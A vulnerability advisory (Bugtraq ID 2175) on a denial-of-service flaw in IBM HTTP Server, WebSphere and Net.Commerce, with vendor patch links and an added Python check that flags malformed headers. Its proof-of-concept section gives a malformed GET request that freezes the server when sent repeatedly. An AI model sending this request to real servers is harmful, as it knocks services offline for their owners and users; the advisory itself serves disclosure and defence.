IBM HTTP Server AfpaCache/WebSphereNet.Data DoS Vulnerability
BID:2175
Info
| Bugtraq ID: | 2175 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 08 2001 12:00AM |
| Updated: | Jan 08 2001 12:00AM |
| Credit: | Discovered and posted to Bugtraq on Jan 8, 2001 by Peter <[email protected]>. |
| Vulnerable: | IBM Net.Commerce Hosting Server 3.1.1; IBM Net.Commerce 3.1.1; IBM Net.Commerce 3.1; IBM Net.Commerce 3.0; IBM Net.Commerce 2.0; IBM HTTP Server 1.3.12 .2; IBM HTTP Server 1.3.6 .4 win32 |
| Not Vulnerable: | |
Discussion
IBM HTTP Server provides the AfpaCache directive, which turns the Fast Response Cache Accelerator function on or off. WebSphere is a series of applications built upon IBM HTTP Server.
Both IBM HTTP Server and WebSphere are subject to a denial of service, caused by exhausting computer resources with malformed HTTP GET requests. A restart of the service is required in order to regain normal functionality.
Exploit / POC
The following example has been provided by Peter <[email protected]>:
GET / HTTP/1.0\r\nuser-agent: 20000xnull\r\n\r\n
This request must be made multiple times before the system will freeze.
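A defensive check for the request shape shown in this section, as an added example that is not part of the original advisory: it inspects a raw request head and reports header values that contain NUL or other control bytes, or that exceed a length limit. Reading `20000xnull` as a run of NUL bytes, the function name `inspect_request` and the 8190-byte limit are assumptions.

```python
# Added example: flag request headers shaped like the one in this advisory.
MAX_HEADER_VALUE = 8190   # assumed per-field limit; tune to your server
ALLOWED_CTL = {0x09}      # HTAB is the only control byte legal in a field value


def inspect_request(raw: bytes) -> list[str]:
    """Return findings for one raw HTTP request head (empty list = clean)."""
    findings = []
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        findings.append("unterminated header block")
    for line in head.split(b"\r\n")[1:]:        # skip the request line
        if not line:
            continue
        name, colon, value = line.partition(b":")
        if not colon:
            findings.append("header line without colon")
            continue
        label = name.strip().decode("latin-1").lower()
        value = value.strip(b" \t")
        nul = value.count(b"\x00")
        if nul:
            findings.append(f"{label}: {nul} NUL byte(s) in value")
        elif any((b < 0x20 and b not in ALLOWED_CTL) or b == 0x7F for b in value):
            findings.append(f"{label}: control byte in value")
        if len(value) > MAX_HEADER_VALUE:
            findings.append(
                f"{label}: value length {len(value)} exceeds {MAX_HEADER_VALUE}"
            )
    return findings


# Constructed samples (not captured traffic).
CLEAN = b"GET / HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\n\r\n"
NUL_UA = b"GET / HTTP/1.0\r\nuser-agent: " + b"\x00" * 16 + b"\r\n\r\n"
LONG_UA = b"GET / HTTP/1.0\r\nuser-agent: " + b"A" * 9000 + b"\r\n\r\n"

if __name__ == "__main__":
    for sample in (CLEAN, NUL_UA, LONG_UA):
        print(inspect_request(sample))
```

Run against requests captured at a reverse proxy or sensor in front of an unpatched server, this check identifies the malformed header before the request reaches the Fast Response Cache Accelerator.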
Solution / Fix
IBM HTTP Server 1.3.12 .2
- IBM PQ42463
  Fixes "Failure to handle memory exception in Fast Response Cache Accelerator (FRCA) can cause a vulnerability in IBM HTTP Server".
  http://www6.software.ibm.com/dl/websphere09/ihttpcorsvc-p

IBM Net.Commerce 2.0
- IBM net.data1.014 patch
  Fixes "CPU overutilization on AIX platform due to a Net.Data defect" problem with Net.Commerce packages.
  ftp://ftp.software.ibm.com/software/netcommerce/

IBM Net.Commerce 3.0
- IBM net.data1.014 patch
  Fixes "CPU overutilization on AIX platform due to a Net.Data defect" problem with Net.Commerce packages.
  ftp://ftp.software.ibm.com/software/netcommerce/

IBM Net.Commerce 3.1
- IBM net.data1.014 patch
  Fixes "CPU overutilization on AIX platform due to a Net.Data defect" problem with Net.Commerce packages.
  ftp://ftp.software.ibm.com/software/netcommerce/

IBM Net.Commerce 3.1.1
- IBM net.data1.014 patch
  Fixes "CPU overutilization on AIX platform due to a Net.Data defect" problem with Net.Commerce packages.
  ftp://ftp.software.ibm.com/software/netcommerce/

IBM Net.Commerce Hosting Server 3.1.1
- IBM net.data1.014 patch
  Fixes "CPU overutilization on AIX platform due to a Net.Data defect" problem with Net.Commerce packages.
  ftp://ftp.software.ibm.com/software/netcommerce/